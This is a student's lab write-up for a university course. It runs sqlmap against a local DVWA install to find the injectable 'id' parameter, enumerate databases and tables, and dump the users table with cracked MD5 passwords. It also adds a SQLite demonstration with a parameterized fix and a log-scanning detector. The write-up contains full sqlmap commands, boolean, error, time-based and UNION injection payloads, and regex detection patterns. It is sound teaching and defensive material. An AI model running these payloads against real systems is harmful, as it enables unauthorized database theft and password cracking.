Subject: Vulnerability Analysis
Student: Miguel Ángel Sánchez Rodríguez
Date: 3 July 2017

Activities

Assignment: Perform SQL injection attacks against the DVWA application

In this activity you must carry out several attacks on the DVWA application using the SQL injection technique.

To do so, you must use the SQLMap tool (installed in Kali by default).

Properly explaining the steps followed for each attack will be viewed positively.

You will have to:

» Indicate which parameter(s) of the URL are vulnerable.
» Obtain the names of the available databases.
» Retrieve the names of the tables in the dvwa database.
» Retrieve the contents of the tables in the dvwa database.

Maximum length: 10 pages (Georgia 11, 1.5 line spacing).

UNIT 3 – Activities © Universidad Internacional de La Rioja, S. A. (UNIR)



Solution

Prerequisites setup

The following environment is used:
» A physical machine running an up-to-date Kali Linux, accessed over SSH with X forwarding so it can be used from another computer.
» A Metasploitable 2 virtual machine with IP 10.0.1.102.
» DVWA (latest version)
  - Because the version shipped by default in Metasploitable 2 is 1.0.7, dated 8/9/2010, the latest version, 1.10 dated 8/10/2015, is downloaded and installed in /var/www/dvwa_last, reachable at the URL http://10.0.1.102/dvwa_last.
  - The files are copied, given permissions, and the file /var/www/dvwa_last/config/config.inc.php is configured.
  - In Setup/Reset DB, the reported problems are fixed until everything shows green (PHP allow_url_include is enabled and a test account for reCAPTCHA is created; although this activity does not require it, it leaves the environment fully prepared for future use).
  - Since this is the first access, Create / Reset Database is clicked.
  - The security level is set to low.
» On the Kali machine, OWASP-ZAP is started, the local proxy server (on localhost:8080) is verified to be working, and Firefox is configured to use that proxy.

Indicate which parameter(s) of the URL are vulnerable.

Open the URL http://10.0.1.102/dvwa_last/, log in and select the SQL Injection vulnerability.
Reviewing the page source (View Source button) shows that the parameters 'id' and 'Submit' are read (via $_REQUEST).
sqlmap needs the session id. A request is made and captured in OWASP-ZAP. The captured header is:
GET http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.0.1.102/dvwa_last/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: 10.0.1.102

This confirms that the parameters sent are id and Submit, as seen in the source code, and the Cookie field is noted so it can be passed to sqlmap.
With this data, sqlmap is launched on the Kali machine:
root@pc1:~# sqlmap -u 'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=3&Submit=Submit' --cookie='security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc'
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 19:34:32

[19:34:32] [INFO] testing connection to the target URL


[19:34:32] [INFO] testing if the target URL is stable
[19:34:33] [INFO] target URL is stable
[19:34:33] [INFO] testing if GET parameter 'id' is dynamic
[19:34:33] [WARNING] GET parameter 'id' does not appear to be dynamic
[19:34:33] [INFO] heuristics detected web page charset 'ascii'
[19:34:33] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
(possible DBMS: 'MySQL')
[19:34:34] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to
cross-site scripting attacks
[19:34:34] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for
other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided
level (1) and risk (1) values? [Y/n]
[19:34:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:34:37] [WARNING] reflective value(s) found and filtering out
[19:34:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL
comment)'
[19:34:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:34:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
(NOT)'
[19:34:51] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or
HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="Bob")
[19:34:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (BIGINT UNSIGNED)'
[19:34:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT
UNSIGNED)'
[19:34:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXP)'
[19:34:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[19:34:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (JSON_KEYS)'
[19:34:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause
(JSON_KEYS)'
[19:34:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'


[19:34:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:34:52] [INFO] testing 'MySQL inline queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:34:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:34:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:35:03] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind'
injectable
[19:35:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] automatically extending ranges for UNION query injection technique tests
as there is at least one other (potential) technique found
[19:35:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range for
current UNION query injection technique test
[19:35:04] [INFO] target URL appears to have 2 columns in query
[19:35:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns'
injectable
[19:35:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch
'--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

… <Tests of the Submit parameter omitted for clarity> …

sqlmap identified the following injection point(s) with a total of 3731 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=3' OR NOT 1788=1788#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813 UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=3' AND SLEEP(5)-- ORcj&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=3' UNION ALL SELECT CONCAT(0x717a6b7071,0x6a4569574c6e6764644b6c584a6b52586e4c777555427461586861554c55486d75464b4e6c696641,0x716a6b7071),NULL#&Submit=Submit
---
[19:43:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[19:43:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.1.102'


[*] shutting down at 19:43:53

Therefore:
» The id parameter IS vulnerable.
» The Submit parameter is NOT vulnerable.
In addition, I run the previous command again adding the -f option, to also obtain the exact MySQL version, which is 5.0.51; this makes it possible to search for exploits (quite a few DoS exploits are found on exploit-db).
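As an added illustration (not part of the original report), the following Python script reproduces why sqlmap's boolean-based test on 'id' succeeds with --not-string="Bob", and shows the parameterized query that closes the hole. It uses an in-memory SQLite table with constructed rows copied from the dvwa.users dump in this report; since SQLite has no '#' comment, the '#' in sqlmap's payload is replaced by the '-- ' form that MySQL also accepts.

```python
import sqlite3

# Constructed in-memory copy of the dvwa.users rows dumped in this report
# (user_id, first_name, last_name only). SQLite stands in for MySQL, so the
# payloads below use the "-- " comment form, which both DBMSs accept, not "#".
USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn

def lookup_vulnerable(conn, user_id):
    # Shape of DVWA's low-security page: the request value is spliced into the
    # SQL text, so a quote closes the literal and the rest is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, user_id):
    # Same query with a bound parameter: the value is data, never SQL syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def response_has_bob(rows):
    # sqlmap's --not-string="Bob" check: 'Bob' (user 5) appears in the page
    # only when the injected condition widens the WHERE clause to every row.
    return any(first == "Bob" for first, _ in rows)

# The two halves of sqlmap's boolean test, adapted from the reported payload
# "3' OR NOT 1788=1788#": one condition is false, the other true.
FALSE_PAYLOAD = "3' OR NOT 1788=1788-- "
TRUE_PAYLOAD = "3' OR NOT 1788=1789-- "

def demo():
    conn = make_db()
    return {
        "vuln_false": response_has_bob(lookup_vulnerable(conn, FALSE_PAYLOAD)),  # False: row 3 only
        "vuln_true": response_has_bob(lookup_vulnerable(conn, TRUE_PAYLOAD)),    # True: all 5 rows
        "safe_true": lookup_hardened(conn, TRUE_PAYLOAD),                         # []: no such id
    }
```

The difference between the two vulnerable responses is exactly the signal sqlmap keys on, while the bound parameter simply finds no user with that id.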

Obtain the names of the available databases.

Since we know the database engine is MySQL, we now pass the options --dbms=mysql -p id --dbs:
root@pc1:~# sqlmap -u 'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=3&Submit=Submit' --cookie='security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -p id --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.6#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 20:16:49

[20:16:49] [INFO] testing connection to the target URL


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: id=3' OR NOT 1788=1788#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813 UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=3' AND SLEEP(5)-- ORcj&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=3' UNION ALL SELECT CONCAT(0x717a6b7071,0x6a4569574c6e6764644b6c584a6b52586e4c777555427461586861554c55486d75464b4e6c696641,0x716a6b7071),NULL#&Submit=Submit
---
[20:16:50] [INFO] testing MySQL


[20:16:50] [INFO] confirming MySQL


[20:16:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[20:16:50] [INFO] fetching database names
[20:16:50] [WARNING] reflective value(s) found and filtering out
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[20:16:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.1.102'

[*] shutting down at 20:16:50

Therefore, the available databases are dvwa, information_schema, metasploit, mysql, owasp10, tikiwiki and tikiwiki195.

Retrieve the names of the tables in the dvwa database.

The option to use is --tables, which by default lists all tables of all databases. To list only the dvwa database, the option -D dvwa is added as well:
root@pc1:~# sqlmap -u 'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=2&Submit=Submit' --cookie 'security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -D dvwa --tables

… <Output omitted for clarity>

[20:42:52] [INFO] fetching tables for database: 'dvwa'


[20:42:52] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[20:42:52] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.1.102'

[*] shutting down at 20:42:52

So the tables in the dvwa database are guestbook and users.

Retrieve the contents of the tables in the dvwa database.

The --dump option is run to dump all the contents. This also makes sqlmap offer to attack the hashes it finds:


root@pc1:~# sqlmap -u 'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie 'security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -D dvwa --dump

… <Output omitted for clarity>

[21:43:45] [INFO] fetching tables for database: 'dvwa'


[21:43:45] [INFO] fetching columns for table 'users' in database 'dvwa'
[21:43:45] [INFO] fetching entries for table 'users' in database 'dvwa'
[21:43:45] [WARNING] reflective value(s) found and filtering out
[21:43:45] [INFO] analyzing table dump for possible password hashes
[21:43:45] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with
other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[21:43:52] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:44:04] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[21:44:09] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:44:09] [INFO] starting 4 processes
[21:44:11] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[21:44:13] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[21:44:15] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[21:44:18] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[21:44:21] [INFO] postprocessing table dump
Database: dvwa
Table: users
[5 entries]
+---------+--------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar                                                 | user    | password                                    | last_name | first_name | last_login          | failed_login |
+---------+--------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | http://10.0.1.102/dvwa_last/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2017-07-04 13:28:11 | 0            |
| 2       | http://10.0.1.102/dvwa_last/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2017-07-04 13:28:11 | 0            |
| 3       | http://10.0.1.102/dvwa_last/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2017-07-04 13:28:11 | 0            |
| 4       | http://10.0.1.102/dvwa_last/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2017-07-04 13:28:11 | 0            |
| 5       | http://10.0.1.102/dvwa_last/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2017-07-04 13:28:11 | 0            |
+---------+--------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+

[21:44:21] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10.0.1.102/dump/dvwa/users.csv'
[21:44:21] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[21:44:21] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
[21:44:21] [INFO] analyzing table dump for possible password hashes
Database: dvwa
Table: guestbook
[1 entry]


+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+

[21:44:21] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.sqlmap/output/10.0.1.102/dump/dvwa/guestbook.csv'
[21:44:21] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.0.1.102'

[*] shutting down at 21:44:21

This yields the contents of the users and guestbook tables (highlighted in yellow in the capture above), as well as the (md5-hashed) passwords of all users.
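From the defender's side, this added Python example (not part of the original report) scans web-server access logs for the same session: it decodes each query-string value and matches the payload shapes sqlmap reported against 'id' (quote followed by OR/AND, UNION SELECT, SLEEP(), MySQL comment tails) and sqlmap's default User-Agent. The Apache log lines, client IPs, byte counts and User-Agent string are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines modelled on the request captured
# with OWASP-ZAP above; the 'id' payloads are the ones sqlmap reported, URL-encoded
# as they travel on the wire. The sqlmap User-Agent string is constructed too.
SAMPLE_LOG = """\
10.0.1.50 - - [03/Jul/2017:19:34:33 +0200] "GET /dvwa_last/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.0.1.50 - - [03/Jul/2017:19:34:51 +0200] "GET /dvwa_last/vulnerabilities/sqli/?id=3%27%20OR%20NOT%201788%3D1788%23&Submit=Submit HTTP/1.1" 200 4123 "-" "sqlmap/1.1.6#stable (http://sqlmap.org)"
10.0.1.50 - - [03/Jul/2017:19:35:03 +0200] "GET /dvwa_last/vulnerabilities/sqli/?id=3%27%20AND%20SLEEP%285%29--%20ORcj&Submit=Submit HTTP/1.1" 200 4123 "-" "sqlmap/1.1.6#stable (http://sqlmap.org)"
10.0.1.50 - - [03/Jul/2017:19:35:04 +0200] "GET /dvwa_last/vulnerabilities/sqli/?id=3%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&Submit=Submit HTTP/1.1" 200 4123 "-" "sqlmap/1.1.6#stable (http://sqlmap.org)"
10.0.1.77 - - [03/Jul/2017:19:40:00 +0200] "GET /dvwa_last/vulnerabilities/sqli/?id=5&Submit=Submit HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
"""

# One rule per technique sqlmap reported; applied to each decoded query value,
# so percent-encoding in the raw URL does not hide the payload.
RULES = {
    "quote-boolean": re.compile(r"'\s*(?:or|and)\s", re.I),       # 3' OR NOT 1788=1788
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time-delay": re.compile(r"\bsleep\s*\(", re.I),             # 3' AND SLEEP(5)
    "comment-tail": re.compile(r"(?:--\s|#)"),                    # MySQL comment markers
}
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def inspect_line(line):
    """Return (client_ip, set of hits) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = set()
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for param, values in query.items():
        for value in values:
            hits.update(f"{param}:{name}" for name, rx in RULES.items() if rx.search(value))
    if m["ua"].lower().startswith("sqlmap"):
        hits.add("ua:sqlmap")   # sqlmap's default User-Agent unless --random-agent is set
    return m["ip"], hits

def scan(log_text):
    """Return the flagged (ip, hits) tuples and a per-client count of flagged requests."""
    flagged, per_client = [], Counter()
    for line in log_text.splitlines():
        result = inspect_line(line)
        if result and result[1]:
            flagged.append(result)
            per_client[result[0]] += 1
    return flagged, per_client
```

The per-client counter is what makes a run like the 3731 requests above stand out even when individual payloads are missed.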
